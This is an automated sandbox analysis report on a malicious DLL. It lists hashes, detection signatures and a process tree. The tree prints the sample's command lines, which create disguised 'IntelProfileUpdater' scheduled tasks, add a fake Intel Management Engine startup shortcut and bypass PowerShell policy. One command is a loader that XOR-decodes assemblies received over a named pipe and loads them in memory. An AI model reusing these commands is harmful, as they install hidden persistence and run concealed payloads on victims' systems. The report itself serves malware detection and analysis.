Windows Analysis Report: JkICQ13OOY.dll
Overview
General Information
Sample name: | JkICQ13OOY.dll (renamed because the original name is a hash value) |
Original sample name: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25.dll.exe |
Analysis ID: | 1576677 |
MD5: | cf174c5741c4dce62fb76c183b5b36d5 |
SHA1: | b982d92cac5d045a983b16033c701e59be93f133 |
SHA256: | c6aad319fcaa6c5f87dc49805d5e287f1870e61e0b93e17b4da556865c212e25 |
Tags: | exe, user-JAMESWT_MHT |
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Powershell creates an autostart link
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- loaddll64.exe (PID: 7384 cmdline: loaddll64.exe "C:\Users\user\Desktop\JkICQ13OOY.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
- conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7436 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- rundll32.exe (PID: 7460 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7444 cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainer MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7764 cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainerInstall MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 7844 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7944 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7992 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8040 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 8168 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- powershell.exe (PID: 2764 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7188 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- rundll32.exe (PID: 8184 cmdline: rundll32.exe C:\Users\user\Desktop\JkICQ13OOY.dll,DllMainerInstallUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 1268 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7376 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementEngine.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management Engine (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save() MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7532 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainer MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7564 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerInstall MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 2508 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 4108 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_Helper /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7284 cmdline: "schtasks.exe" /Delete /TN IntelProfileUpdater_OnLogOnDaily /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7808 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_OnLogOnDaily\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 8132 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_OnLogOnDaily /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- powershell.exe (PID: 4120 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "schtasks /create /tn \"IntelProfileUpdater_Helper\" /xml \"C:\Users\user\AppData\Local\task.xml\"" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 7964 cmdline: "C:\Windows\system32\schtasks.exe" /create /tn IntelProfileUpdater_Helper /xml C:\Users\user\AppData\Local\task.xml MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- rundll32.exe (PID: 7588 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerInstallUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- taskkill.exe (PID: 8144 cmdline: "taskkill" /F /IM powershell.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7312 cmdline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut('C:\Users\user\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup/IntelManagementEngine.lnk') $Shortcut.TargetPath = 'powershell.exe' $Shortcut.Description = 'The Intel Management Engine (ME) is an embedded microcontroller running on a dedicated microprocessor integrated into Intel chipsets.' $Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll",DllMainerUserOnly' $Shortcut.WindowStyle = 7 $Shortcut.Save() MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",Dummy MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7644 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DotNetRuntimeDebugHeader MD5: EF3179D498793BF4234F708D3BE28633)
- WerFault.exe (PID: 8072 cmdline: C:\Windows\system32\WerFault.exe -u -p 7644 -s 372 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- rundll32.exe (PID: 7692 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- powershell.exe (PID: 3856 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Write-Host 'Dummy process started. Press Ctrl+C to exit.'; while ($true) { try { Start-Sleep -Seconds 1 } catch { Write-Host 'Close signal received. Exiting...'; break } }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4888 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "function Load-Assembly($asmBytes) { # XOR the assembly byte array $xorKey = 164 [byte[]] $decodedBytes = New-Object byte[] $asmBytes.Length for ($i = 0; $i -lt $asmBytes.Length; $i++) { $decodedBytes[$i] = $asmBytes[$i] -bxor $xorKey } # Load the assembly from the modified byte array $assembly = [System.Reflection.Assembly]::Load($decodedBytes) # Search for a Program class and a Main method to invoke $programType = $assembly.GetType(\"Program\", $false) if ($programType -ne $null) { $mainMethod = $programType.GetMethod(\"Main\", [System.Reflection.BindingFlags] \"Static,Public,NonPublic\") if ($mainMethod -ne $null -and $mainMethod.GetParameters().Length -eq 1 -and $mainMethod.GetParameters()[0].ParameterType -eq [string[]]) { $arguments = [System.String[]]@(\"--powershell\") $mainMethod.Invoke($null, [System.Object[]]@(,$arguments)) } else { #throw \"No entry point found.\"; } } else { #throw \"Program class not found.\"; } } $a = [System.Reflection.Assembly]::LoadFrom(\"C:\Users\user\AppData\Roaming\IntelManagementUnit\FSharp.Core.All.dll\"); $in_pipe = New-Object System.IO.Pipes.NamedPipeClientStream(\"XPPYQKINMHMWHQNYMQCUQIPEPGQFJXLIYYECMMVQOLJNIMTJUEEDNSHULLXPEFHEHWFGELSYOPPOKRMYCCRJMMADEUFNIAITFSINYJBPTGSLFHVIUVOLPNRGCXQYVLRC\"); $in_pipe.Connect(); # Get the current process ID $processId = [System.Diagnostics.Process]::GetCurrentProcess().Id # Convert the process ID to byte array $bytes = [System.BitConverter]::GetBytes($processId) # Assuming $in_pipe is a System.IO.Pipes.PipeStream or similar # You would write the byte array to it like this: $in_pipe.Write($bytes, 0, $bytes.Length) $in_pipe.Flush() $buffer = new-object byte[] 98616;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 156160;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;$buffer = new-object byte[] 21504;$rrrr=$in_pipe.Read($buffer, 0, $buffer.Length);$aaaa=Load-Assembly($buffer);;;;" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7720 cmdline: rundll32.exe "C:\Users\user\Desktop\JkICQ13OOY.dll",DllMainerSmartAndSilent MD5: EF3179D498793BF4234F708D3BE28633)
- powershell.exe (PID: 6320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command C:\Windows\System32\rundll32.exe C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll,DllMainerUserOnly MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 6912 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming/IntelManagementUnit/Mainer.dll,DllMainerUserOnly MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
No configs have been found
No yara matches
System Summary
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |